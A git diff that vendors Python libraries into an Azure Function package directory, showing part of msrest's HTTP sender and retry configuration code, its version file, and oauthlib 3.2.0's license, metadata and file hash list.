bool(self.config.redirect_policy) + requests_kwargs['headers'] = self.config.headers.copy() + + proxies = self.config.proxies() + if proxies: + requests_kwargs['proxies'] = proxies + + # Replace by operation level kwargs + # We allow some of them, since some like stream or json are controlled by msrest + for key in kwargs: + if key in self._REQUESTS_KWARGS: + requests_kwargs[key] = kwargs[key] + + # Hooks. Deprecated, should be a policy + def make_user_hook_cb(user_hook, session): + def user_hook_cb(r, *args, **kwargs): + kwargs.setdefault("msrest", {})['session'] = session + return user_hook(r, *args, **kwargs) + return user_hook_cb + + hooks = [] + for user_hook in self.config.hooks: + hooks.append(make_user_hook_cb(user_hook, self.session)) + + if hooks: + requests_kwargs['hooks'] = {'response': hooks} + + # Configuration callback. Deprecated, should be a policy + output_kwargs = self.config.session_configuration_callback( + session, + self.config, + kwargs, + **requests_kwargs + ) + if output_kwargs is not None: + requests_kwargs = output_kwargs + + # If custom session was not create here + if session is not self.session: + requests_kwargs['session'] = session + + ### Autorest forced kwargs now ### + + # If Autorest needs this response to be streamable. True for compat. + requests_kwargs['stream'] = kwargs.get('stream', True) + + if request.files: + requests_kwargs['files'] = request.files + elif request.data: + requests_kwargs['data'] = request.data + requests_kwargs['headers'].update(request.headers) + + return requests_kwargs + + def send(self, request, **kwargs): + # type: (ClientRequest, Any) -> ClientResponse + """Send request object according to configuration. + + Available kwargs: + - session : will override the driver session and use yours. Should NOT be done unless really required. + - A subset of what requests.Session.request can receive: + + - cookies + - verify + - timeout + - allow_redirects + - proxies + - verify + - cert + + Everything else will be silently ignored. + + :param ClientRequest request: The request object to be sent. + """ + requests_kwargs = self._configure_send(request, **kwargs) + return super(RequestsHTTPSender, self).send(request, **requests_kwargs) + + +class ClientRetryPolicy(object): + """Retry configuration settings. + Container for retry policy object. + """ + + safe_codes = [i for i in range(500) if i != 408] + [501, 505] + + def __init__(self): + self.policy = Retry() + self.policy.total = 3 + self.policy.connect = 3 + self.policy.read = 3 + self.policy.backoff_factor = 0.8 + self.policy.BACKOFF_MAX = 90 + + retry_codes = [i for i in range(999) if i not in self.safe_codes] + self.policy.status_forcelist = retry_codes + self.policy.method_whitelist = ['HEAD', 'TRACE', 'GET', 'PUT', + 'OPTIONS', 'DELETE', 'POST', 'PATCH'] + + def __call__(self): + # type: () -> Retry + """Return configuration to be applied to connection.""" + debug = ("Configuring retry: max_retries=%r, " + "backoff_factor=%r, max_backoff=%r") + _LOGGER.debug( + debug, self.retries, self.backoff_factor, self.max_backoff) + return self.policy + + @property + def retries(self): + # type: () -> int + """Total number of allowed retries.""" + return self.policy.total + + @retries.setter + def retries(self, value): + # type: (int) -> None + self.policy.total = value + self.policy.connect = value + self.policy.read = value + + @property + def backoff_factor(self): + # type: () -> Union[int, float] + """Factor by which back-off delay is incrementally increased.""" + return self.policy.backoff_factor + + @backoff_factor.setter + def backoff_factor(self, value): + # type: (Union[int, float]) -> None + self.policy.backoff_factor = value + + @property + def max_backoff(self): + # type: () -> int + """Max retry back-off delay.""" + return self.policy.BACKOFF_MAX + + @max_backoff.setter + def max_backoff(self, value): + # type: (int) -> None + self.policy.BACKOFF_MAX = value + +def default_session_configuration_callback(session, global_config, local_config, **kwargs): # pylint: disable=unused-argument + # type: (requests.Session, RequestHTTPSenderConfiguration, Dict[str,str], str) -> Dict[str, str] + """Configuration callback if you need to change default session configuration. + + :param requests.Session session: The session. + :param Configuration global_config: The global configuration. + :param dict[str,str] local_config: The on-the-fly configuration passed on the call. + :param dict[str,str] kwargs: The current computed values for session.request method. + :return: Must return kwargs, to be passed to session.request. If None is return, initial kwargs will be used. + :rtype: dict[str,str] + """ + return kwargs + +class RequestHTTPSenderConfiguration(HTTPSenderConfiguration): + """Requests specific HTTP sender configuration. + + :param str filepath: Path to existing config file (optional). + """ + + def __init__(self, filepath=None): + # type: (Optional[str]) -> None + + super(RequestHTTPSenderConfiguration, self).__init__() + + # Retry configuration + self.retry_policy = ClientRetryPolicy() + + # Requests hooks. Must respect requests hook callback signature + # Note that we will inject the following parameters: + # - kwargs['msrest']['session'] with the current session + self.hooks = [] # type: List[Callable[[requests.Response, str, str], None]] + + self.session_configuration_callback = default_session_configuration_callback + + if filepath: + self.load(filepath) + + def save(self, filepath): + """Save current configuration to file. + + :param str filepath: Path to file where settings will be saved. + :raises: ValueError if supplied filepath cannot be written to. + """ + self._config.add_section("RetryPolicy") + self._config.set("RetryPolicy", "retries", str(self.retry_policy.retries)) + self._config.set("RetryPolicy", "backoff_factor", + str(self.retry_policy.backoff_factor)) + self._config.set("RetryPolicy", "max_backoff", + str(self.retry_policy.max_backoff)) + super(RequestHTTPSenderConfiguration, self).save(filepath) + + def load(self, filepath): + try: + self.retry_policy.retries = \ + self._config.getint("RetryPolicy", "retries") + self.retry_policy.backoff_factor = \ + self._config.getfloat("RetryPolicy", "backoff_factor") + self.retry_policy.max_backoff = \ + self._config.getint("RetryPolicy", "max_backoff") + except (ValueError, EnvironmentError, NoOptionError): + error = "Supplied config file incompatible." + raise_with_traceback(ValueError, error) + finally: + self._clear_config() + super(RequestHTTPSenderConfiguration, self).load(filepath) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/version.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/version.py new file mode 100644 index 0000000..7b567fe --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/version.py @@ -0,0 +1,28 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +#: version of this package. Use msrest.__version__ instead +msrest_version = "0.7.1" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/LICENSE new file mode 100644 index 0000000..5cf6b82 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/LICENSE @@ -0,0 +1,27 @@ +Copyright (c) 2019 The OAuthlib Community +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + + 1. Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + 3. Neither the name of this project nor the names of its contributors may + be used to endorse or promote products derived from this software without + specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/METADATA new file mode 100644 index 0000000..b852974 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/METADATA @@ -0,0 +1,181 @@ +Metadata-Version: 2.1 +Name: oauthlib +Version: 3.2.0 +Summary: A generic, spec-compliant, thorough implementation of the OAuth request-signing logic +Home-page: https://github.com/oauthlib/oauthlib +Author: The OAuthlib Community +Author-email: idan@gazit.me +Maintainer: Ib Lundgren +Maintainer-email: ib.lundgren@gmail.com +License: BSD +Platform: any +Classifier: Development Status :: 5 - Production/Stable +Classifier: Environment :: Web Environment +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved +Classifier: License :: OSI Approved :: BSD License +Classifier: Operating System :: MacOS +Classifier: Operating System :: POSIX +Classifier: Operating System :: POSIX :: Linux +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: Implementation +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Topic :: Software Development :: Libraries :: Python Modules +Requires-Python: >=3.6 +Description-Content-Type: text/x-rst +License-File: LICENSE +Provides-Extra: rsa +Requires-Dist: cryptography (>=3.0.0) ; extra == 'rsa' +Provides-Extra: signals +Requires-Dist: blinker (>=1.4.0) ; extra == 'signals' +Provides-Extra: signedtoken +Requires-Dist: cryptography (>=3.0.0) ; extra == 'signedtoken' +Requires-Dist: pyjwt (<3,>=2.0.0) ; extra == 'signedtoken' + +OAuthLib - Python Framework for OAuth1 & OAuth2 +=============================================== + +*A generic, spec-compliant, thorough implementation of the OAuth request-signing +logic for Python 3.6+.* + +.. image:: https://travis-ci.org/oauthlib/oauthlib.svg?branch=master + :target: https://travis-ci.org/oauthlib/oauthlib + :alt: Travis +.. image:: https://coveralls.io/repos/oauthlib/oauthlib/badge.svg?branch=master + :target: https://coveralls.io/r/oauthlib/oauthlib + :alt: Coveralls +.. image:: https://img.shields.io/pypi/pyversions/oauthlib.svg + :target: https://pypi.org/project/oauthlib/ + :alt: Download from PyPI +.. image:: https://img.shields.io/pypi/l/oauthlib.svg + :target: https://pypi.org/project/oauthlib/ + :alt: License +.. image:: https://app.fossa.io/api/projects/git%2Bgithub.com%2Foauthlib%2Foauthlib.svg?type=shield + :target: https://app.fossa.io/projects/git%2Bgithub.com%2Foauthlib%2Foauthlib?ref=badge_shield + :alt: FOSSA Status +.. image:: https://img.shields.io/readthedocs/oauthlib.svg + :target: https://oauthlib.readthedocs.io/en/latest/index.html + :alt: Read the Docs +.. image:: https://badges.gitter.im/oauthlib/oauthlib.svg + :target: https://gitter.im/oauthlib/Lobby + :alt: Chat on Gitter + + +.. image:: https://raw.githubusercontent.com/oauthlib/oauthlib/8d71b161fd145d11c40d55c9ab66ac134a303253/docs/logo/oauthlib-banner-700x192.png + :target: https://github.com/oauthlib/oauthlib/ + :alt: OAuth + Python = OAuthlib Python Framework + + +OAuth often seems complicated and difficult-to-implement. There are several +prominent libraries for handling OAuth requests, but they all suffer from one or +both of the following: + +1. They predate the `OAuth 1.0 spec`_, AKA RFC 5849. +2. They predate the `OAuth 2.0 spec`_, AKA RFC 6749. +3. They assume the usage of a specific HTTP request library. + +.. _`OAuth 1.0 spec`: https://tools.ietf.org/html/rfc5849 +.. _`OAuth 2.0 spec`: https://tools.ietf.org/html/rfc6749 + +OAuthLib is a framework which implements the logic of OAuth1 or OAuth2 without +assuming a specific HTTP request object or web framework. Use it to graft OAuth +client support onto your favorite HTTP library, or provide support onto your +favourite web framework. If you're a maintainer of such a library, write a thin +veneer on top of OAuthLib and get OAuth support for very little effort. + + +Documentation +-------------- + +Full documentation is available on `Read the Docs`_. All contributions are very +welcome! The documentation is still quite sparse, please open an issue for what +you'd like to know, or discuss it in our `Gitter community`_, or even better, send a +pull request! + +.. _`Gitter community`: https://gitter.im/oauthlib/Lobby +.. _`Read the Docs`: https://oauthlib.readthedocs.io/en/latest/index.html + +Interested in making OAuth requests? +------------------------------------ + +Then you might be more interested in using `requests`_ which has OAuthLib +powered OAuth support provided by the `requests-oauthlib`_ library. + +.. _`requests`: https://github.com/requests/requests +.. _`requests-oauthlib`: https://github.com/requests/requests-oauthlib + +Which web frameworks are supported? +----------------------------------- + +The following packages provide OAuth support using OAuthLib. + +- For Django there is `django-oauth-toolkit`_, which includes `Django REST framework`_ support. +- For Flask there is `flask-oauthlib`_ and `Flask-Dance`_. +- For Pyramid there is `pyramid-oauthlib`_. +- For Bottle there is `bottle-oauthlib`_. + +If you have written an OAuthLib package that supports your favorite framework, +please open a Pull Request, updating the documentation. + +.. _`django-oauth-toolkit`: https://github.com/evonove/django-oauth-toolkit +.. _`flask-oauthlib`: https://github.com/lepture/flask-oauthlib +.. _`Django REST framework`: http://django-rest-framework.org +.. _`Flask-Dance`: https://github.com/singingwolfboy/flask-dance +.. _`pyramid-oauthlib`: https://github.com/tilgovi/pyramid-oauthlib +.. _`bottle-oauthlib`: https://github.com/thomsonreuters/bottle-oauthlib + +Using OAuthLib? Please get in touch! +------------------------------------ +Patching OAuth support onto an http request framework? Creating an OAuth +provider extension for a web framework? Simply using OAuthLib to Get Things Done +or to learn? + +No matter which we'd love to hear from you in our `Gitter community`_ or if you have +anything in particular you would like to have, change or comment on don't +hesitate for a second to send a pull request or open an issue. We might be quite +busy and therefore slow to reply but we love feedback! + +Chances are you have run into something annoying that you wish there was +documentation for, if you wish to gain eternal fame and glory, and a drink if we +have the pleasure to run into eachother, please send a docs pull request =) + +.. _`Gitter community`: https://gitter.im/oauthlib/Lobby + +License +------- + +OAuthLib is yours to use and abuse according to the terms of the BSD license. +Check the LICENSE file for full details. + +Credits +------- + +OAuthLib has been started and maintained several years by Idan Gazit and other +amazing `AUTHORS`_. Thanks to their wonderful work, the open-source `community`_ +creation has been possible and the project can stay active and reactive to users +requests. + + +.. _`AUTHORS`: https://github.com/oauthlib/oauthlib/blob/master/AUTHORS +.. _`community`: https://github.com/oauthlib/ + +Changelog +--------- + +*OAuthLib is in active development, with the core of both OAuth1 and OAuth2 +completed, for providers as well as clients.* See `supported features`_ for +details. + +.. _`supported features`: https://oauthlib.readthedocs.io/en/latest/feature_matrix.html + +For a full changelog see ``CHANGELOG.rst``. + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/RECORD new file mode 100644 index 0000000..3b9e940 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/RECORD @@ -0,0 +1,142 @@ +oauthlib-3.2.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +oauthlib-3.2.0.dist-info/LICENSE,sha256=PR4S2KxSwLbBSK9tKR9yQAuHIO0WwKxKiYaLbRSxyTk,1530 +oauthlib-3.2.0.dist-info/METADATA,sha256=4BfXhM-eajiPmT96iyP4bykMyHf_Xz2pfggvcOyrNv0,7447 +oauthlib-3.2.0.dist-info/RECORD,, +oauthlib-3.2.0.dist-info/WHEEL,sha256=G16H4A3IeoQmnOrYV4ueZGKSjhipXx8zc8nu9FGlvMA,92 +oauthlib-3.2.0.dist-info/top_level.txt,sha256=gz2py0fFs1AhG1O7KpHPcIXOgXOwdIiCaSnmLkiR12Q,9 +oauthlib/__init__.py,sha256=mhqqb9kZLISCLzTMXwHwdDnS3q_7-NQciRNsQr_1q5M,686 +oauthlib/__pycache__/__init__.cpython-39.pyc,, +oauthlib/__pycache__/common.cpython-39.pyc,, +oauthlib/__pycache__/signals.cpython-39.pyc,, +oauthlib/__pycache__/uri_validate.cpython-39.pyc,, +oauthlib/common.py,sha256=FimXHIfgk-XVgzu3lq6-wv3Jsq7hzGgsurwGvTm3t3A,13422 +oauthlib/oauth1/__init__.py,sha256=U_6yHcB8jdYPbcas4CBel7tE_YYCN5S1300U3zVlWlE,1187 +oauthlib/oauth1/__pycache__/__init__.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/__init__.py,sha256=-5sJHDG3JRZQRJYlCjkj3CP2jZgqEg0OY5pVIxE4mxE,16744 +oauthlib/oauth1/rfc5849/__pycache__/__init__.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/__pycache__/errors.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/__pycache__/parameters.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/__pycache__/request_validator.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/__pycache__/signature.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/__pycache__/utils.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/endpoints/__init__.py,sha256=SeIECziJ-Sv_NCGnowG3P9UnX_VdFNldRqRywEaJvxY,327 +oauthlib/oauth1/rfc5849/endpoints/__pycache__/__init__.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/endpoints/__pycache__/access_token.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/endpoints/__pycache__/authorization.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/endpoints/__pycache__/base.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/endpoints/__pycache__/pre_configured.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/endpoints/__pycache__/request_token.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/endpoints/__pycache__/resource.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/endpoints/__pycache__/signature_only.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/endpoints/access_token.py,sha256=CRgLV5DqDiwVvbo8MiHySbTEKrxETJV29-VGu-2kQ7Y,9347 +oauthlib/oauth1/rfc5849/endpoints/authorization.py,sha256=zbU7TzO6nB6853UIqtTkhxUV-JTHOdOc-CvdQsIQKWk,6724 +oauthlib/oauth1/rfc5849/endpoints/base.py,sha256=pBOS1MqIrJVxydTD6jnzZcGZRh_NMbRmT1c_c2ISKVs,11643 +oauthlib/oauth1/rfc5849/endpoints/pre_configured.py,sha256=Ie5oBUq_JTsXQdvfWhcMRjhH3OOxS_mRHbKBQ9TpsGg,543 +oauthlib/oauth1/rfc5849/endpoints/request_token.py,sha256=Nz-d7ShVB5Hlh9cAKTp-KHeHH_t5f7khvtCVT8avM9Q,9293 +oauthlib/oauth1/rfc5849/endpoints/resource.py,sha256=rmzBuF0FyrLTpaAehFx0wkj0laAoe7XTdbbeRTrUCZQ,7376 +oauthlib/oauth1/rfc5849/endpoints/signature_only.py,sha256=MX5zV66v4-wrR4cu7OmOd_GF3L8ysM60HmEiHtRR0l8,3327 +oauthlib/oauth1/rfc5849/errors.py,sha256=WPvKVjPlgkCYp6TXvcwC8VETkhsZBzphKCkTJKDPNfM,2474 +oauthlib/oauth1/rfc5849/parameters.py,sha256=Abnxpix_Yy7P3A3vbkrV2bkFxtnR5TRTTKdOu9MKydo,4802 +oauthlib/oauth1/rfc5849/request_validator.py,sha256=x1c8EdFxdvSvilHQ_ZavkiSDjPy6gkYb0gMhXqLr7cw,30988 +oauthlib/oauth1/rfc5849/signature.py,sha256=FBrizlpvzlHjsJbT3AMmYOyBD_OnpOeEdSxXCg-1iAY,32024 +oauthlib/oauth1/rfc5849/utils.py,sha256=IapG_jM6iMe4e0DYWWds1jp-wce2Lf_cuhFrtCP_2ls,2613 +oauthlib/oauth2/__init__.py,sha256=uPkdHF2NEpIM6Ybz-jPPEKU5e56eHptaOz2NPwppyys,1597 +oauthlib/oauth2/__pycache__/__init__.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/__init__.py,sha256=sJcxfdG6HTloXzhkG8-PTJTVQWoCeNtnw6ODNCJNw58,404 +oauthlib/oauth2/rfc6749/__pycache__/__init__.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/__pycache__/errors.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/__pycache__/parameters.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/__pycache__/request_validator.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/__pycache__/tokens.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/__pycache__/utils.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/clients/__init__.py,sha256=TuYtiErfo0_Ej0816tIv5rBsrwA9BjYz3tu_ZM0X364,504 +oauthlib/oauth2/rfc6749/clients/__pycache__/__init__.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/clients/__pycache__/backend_application.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/clients/__pycache__/base.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/clients/__pycache__/legacy_application.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/clients/__pycache__/mobile_application.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/clients/__pycache__/service_application.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/clients/__pycache__/web_application.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/clients/backend_application.py,sha256=CAhmHPY3vJ1-McjrMQ4TgJXXqx2Ls9PLfuPWUV0JEtY,3223 +oauthlib/oauth2/rfc6749/clients/base.py,sha256=q1_tKeEE-3KBUxUrIneMXabiBK9T9iGr9aXaowdPB6E,26575 +oauthlib/oauth2/rfc6749/clients/legacy_application.py,sha256=FVDcZNyJK-uSSAPJUQMM3Ud_-EAzJJ8pZ5rr937c7NY,4031 +oauthlib/oauth2/rfc6749/clients/mobile_application.py,sha256=nuM6Gp7jZtY6xP85j1hQUp1nvW_6MpM_dK3wJntKxb4,8877 +oauthlib/oauth2/rfc6749/clients/service_application.py,sha256=fBxB-eY6kG1NKrl5jGfFCJFAJt_PJP8opUdRKY7sojA,7810 +oauthlib/oauth2/rfc6749/clients/web_application.py,sha256=2wtPArVJipR0n3kSCDca-V2SQuVPl4PhGWl57LiOxDo,12086 +oauthlib/oauth2/rfc6749/endpoints/__init__.py,sha256=RL_txhULl35A74dbvlJ7nvqwp3GMCSCpg_4TvjoO-Xk,553 +oauthlib/oauth2/rfc6749/endpoints/__pycache__/__init__.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/endpoints/__pycache__/authorization.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/endpoints/__pycache__/base.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/endpoints/__pycache__/introspect.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/endpoints/__pycache__/metadata.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/endpoints/__pycache__/pre_configured.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/endpoints/__pycache__/resource.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/endpoints/__pycache__/revocation.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/endpoints/__pycache__/token.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/endpoints/authorization.py,sha256=2N2Cb_TQtpUPcqDIclsJnZERtaMKmH9uSgGoMZLFnUI,4584 +oauthlib/oauth2/rfc6749/endpoints/base.py,sha256=fUhCGaftD5bm5PstA6L2CqUNb9kHDpUj4_BsvLRbi4w,4130 +oauthlib/oauth2/rfc6749/endpoints/introspect.py,sha256=SGVI0jI1KmstheTNxMWfngNWCtvdkNTi-H_o3MRQvHE,4983 +oauthlib/oauth2/rfc6749/endpoints/metadata.py,sha256=ySOnnACtwTCjXmojYwZA_EC3EU7OMBlJ117x9P9xxuM,10516 +oauthlib/oauth2/rfc6749/endpoints/pre_configured.py,sha256=ChhORao78XGGlnikJsLb6d_FZvKaLGBUM-te-84NeJ8,11954 +oauthlib/oauth2/rfc6749/endpoints/resource.py,sha256=vpXoovgpmByY-IuW0PDccS5IJGFoFiLVjLLUpGFmXX4,3248 +oauthlib/oauth2/rfc6749/endpoints/revocation.py,sha256=hH3F2G3-QmqCQ1tE4yN2AQfaQ2lEB46YkO5-n1ophGE,5212 +oauthlib/oauth2/rfc6749/endpoints/token.py,sha256=iJDlaSkVR8U6s1_T9fiyVnLgfCgOWsq9PFDcmzL74H4,4595 +oauthlib/oauth2/rfc6749/errors.py,sha256=5EE4Qs3ru34d33wqaFo-WGOofLLYK1jTov9sqG92CW0,12947 +oauthlib/oauth2/rfc6749/grant_types/__init__.py,sha256=im_XwEWmw3dhmzcdfyhkN38xZopBhL3cRShmmCtqQs0,368 +oauthlib/oauth2/rfc6749/grant_types/__pycache__/__init__.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/grant_types/__pycache__/authorization_code.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/grant_types/__pycache__/base.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/grant_types/__pycache__/implicit.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/grant_types/__pycache__/refresh_token.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-39.pyc,, +oauthlib/oauth2/rfc6749/grant_types/authorization_code.py,sha256=R2cXCtdGfDkKseYu-raoZkOpc7lnMa2oVRBs-C3jGKs,26858 +oauthlib/oauth2/rfc6749/grant_types/base.py,sha256=BMcu0_Ks0khfp0B0w2t8CgT6hx9YDjUtkIx95fHf8MM,10213 +oauthlib/oauth2/rfc6749/grant_types/client_credentials.py,sha256=Wr0CpWDVmHrIfOBPTYp9RxnISTfYdp5SjSaRAu77vUY,5079 +oauthlib/oauth2/rfc6749/grant_types/implicit.py,sha256=hYAEYOwToxo3eNpGRC9SyJue93tu37jZVL7MYiaErDs,16852 +oauthlib/oauth2/rfc6749/grant_types/refresh_token.py,sha256=OW0mI-sUPfiTD2UaiZEv8kdpp6QGVSRJEvopJyuRELw,5832 +oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py,sha256=9FsDbrSNNylWKkEvgdafJDzlNncTRCOhIZODo-f4ZIM,8516 +oauthlib/oauth2/rfc6749/parameters.py,sha256=WYiyVkEfKS66fXpyczcard3bDaMHy0h1H5l2PUtUY_c,19016 +oauthlib/oauth2/rfc6749/request_validator.py,sha256=CduQ-_Utp1_LrHNDhrC_zx6KMrNFVAVNB8e5_vVziWw,28814 +oauthlib/oauth2/rfc6749/tokens.py,sha256=H6QOIMNGXFEhDeBfOdK2I_UparP5KRrz55SZQJ4WpVY,11097 +oauthlib/oauth2/rfc6749/utils.py,sha256=EKlU_U-FcYkdd8PvXo1irtHTqBXF7gKqdFKBadteZ64,2207 +oauthlib/oauth2/rfc8628/__init__.py,sha256=yfG2QHuDxrp7_9HNKPEeXYXA_qBVZqiRrhI7q2cG4NM,232 +oauthlib/oauth2/rfc8628/__pycache__/__init__.cpython-39.pyc,, +oauthlib/oauth2/rfc8628/clients/__init__.py,sha256=indCdGycy9cekvLOBxYbCwtyezEVhl3uKZzoShml-aY,201 +oauthlib/oauth2/rfc8628/clients/__pycache__/__init__.cpython-39.pyc,, +oauthlib/oauth2/rfc8628/clients/__pycache__/device.cpython-39.pyc,, +oauthlib/oauth2/rfc8628/clients/device.py,sha256=DjDTy51Vxyl28u5sQGB2UsPzr-VAFNO52okuOtw5BcQ,3878 +oauthlib/openid/__init__.py,sha256=qZQCKCdQt40myte_nxSYrWvzf1VVADqRl8om0-t6LzE,162 +oauthlib/openid/__pycache__/__init__.cpython-39.pyc,, +oauthlib/openid/connect/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +oauthlib/openid/connect/__pycache__/__init__.cpython-39.pyc,, +oauthlib/openid/connect/core/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +oauthlib/openid/connect/core/__pycache__/__init__.cpython-39.pyc,, +oauthlib/openid/connect/core/__pycache__/exceptions.cpython-39.pyc,, +oauthlib/openid/connect/core/__pycache__/request_validator.cpython-39.pyc,, +oauthlib/openid/connect/core/__pycache__/tokens.cpython-39.pyc,, +oauthlib/openid/connect/core/endpoints/__init__.py,sha256=nQ6mGniUaM9X1ENG0tZlPgWgbLdlFESWGK-5_e8mp5Y,229 +oauthlib/openid/connect/core/endpoints/__pycache__/__init__.cpython-39.pyc,, +oauthlib/openid/connect/core/endpoints/__pycache__/pre_configured.cpython-39.pyc,, 